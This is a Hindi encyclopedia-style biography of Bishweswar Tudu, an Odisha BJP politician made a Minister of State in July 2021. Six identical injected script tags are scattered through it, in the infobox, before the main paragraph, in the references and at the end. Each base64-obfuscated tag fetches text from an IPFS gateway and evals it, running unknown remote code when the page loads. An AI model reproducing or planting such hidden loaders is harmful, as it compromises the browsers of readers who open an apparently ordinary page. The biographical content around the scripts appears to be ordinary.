बिश्वेश्वर टुडू
बिश्वेश्वर टुडू
| |
पूरा नाम | बिश्वेश्वर टुडू |
जन्म | 28 मार्च, 1965 |
जन्म भूमि | मयूरभंज, उड़ीसा |
अभिभावक | पिता- सुकिल टुडु |
पति/पत्नी | सुमित्रा टुडू |
संतान | एक पुत्र, दो पुत्री |
नागरिकता | भारतीय |
प्रसिद्धि | राजनीतिज्ञ |
पार्टी | भारतीय जनता पार्टी |
पद | राज्य मंत्री, जनजातीय मामलों के मंत्रालय- 7 जुलाई, 2021 से |
शिक्षा | डिप्लोमा (इलैक्ट्रीकल इंजीनियरिंग) |
संबंधित लेख | नरेन्द्र मोदी का मंत्रिमण्डल, नरेन्द्र मोदी |
अद्यतन | 14:58, 22 जुलाई 2021 (IST) <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>बिश्वेश्वर टुडू (अंग्रेज़ी: Bishweswar Tudu, जन्म- 28 मार्च, 1965, मयूरभंज, उड़ीसा) भारतीय जनता पार्टी के राजनीतिज्ञ हैं जिन्हें 7 जुलाई, 2021 को प्रधानमंत्री नरेन्द्र मोदी के मंत्रिमण्डल में विस्तार तथा फेरबदल के बाद 'जनजातीय मामलों के मंत्रालय' तथा 'जल शक्ति मंत्रालय' में राज्य मंत्री बनाया गया है। कोरापुट के जंगलों में पले-बढ़े और अखिल भारतीय वनवासी कल्याण आश्रम के पदाधिकारी के रूप में ओडिशा के आदिवासियों के लिए काम करने वाले नेता विश्वेश्वर टुडु केंद्रीय मंत्रिमंडल में राज्य का आदिवासी चेहरा बनकर उभरे हैं।[1]
- केंद्रीय मंत्रिमंडल में ओडिशा के आदिवासी नेता बिश्वेश्वर टुडू को जगह दी गई है। बिश्वेश्वर टुडू को राज्य मंत्री बनाया गया है। उन्हें जनजातीय मामलों के मंत्रालय के साथ जल शक्ति मंत्रालय का जिम्मा दिया गया है।
- बिश्वेश्वर टुडू ओडिशा के आदिवासी नेता हैं। उन्होंने 2019 में मयूरभंज (एसटी) लोकसभा सीट से अपना पहला लोकसभा चुनाव जीता था।
- इलेक्ट्रिकल इंजीनियरिंग में डिप्लोमा हासिल करने वाले बिश्वेश्वर टुडू करीब 19 साल से आरएसएस से संबद्ध विद्या भारती (ओडिशा में शिक्षा विकास समिति) सहित विभिन्न सामाजिक गतिविधियों में शामिल रहे हैं।
- उन्हें नवम्बर 2020 में मध्य प्रदेश के भाजपा के सह-प्रभारी के रूप में भी नियुक्त किया गया था।
- बिश्वेश्वर टुडू ओडिशा के आदिवासी बहुल मयूरभंज जिले से हैं, जहां भाजपा मजबूत स्थिति में रही है।
- सेवानिवृत्त सैन्यकर्मी सुकिल टुडु के बेटे विश्वेश्वर टुडु राष्ट्रीय स्वयंसेवक संघ द्वारा संचालित संगठनों से निकटता से जुड़े रहे। उनके पिता भी मयूरभंज जिले में मोराडा प्रखंड के सनामुंडामणि ग्राम पंचायत के पूर्व सरपंच थे। अखिल भारतीय वनवासी कल्याण आश्रम से जुड़ने के अलावा टुडु संघ परिवार की सरस्वती शिशु मंदिर परियोजना में भी सक्रिय रहे।
|
|
|
|
|
टीका टिप्पणी और संदर्भ
- ↑ बिश्वेश्वर को मिला जल शक्ति मंत्रालय (हिंदी) react.etvbharat.com। अभिगमन तिथि: 22 जुलाई, 2021।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
संबंधित लेख
नरेन्द्र मोदी का कैबिनेट मंत्रिमण्डल
क्रमांक | मंत्री नाम | मंत्रालय |
---|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>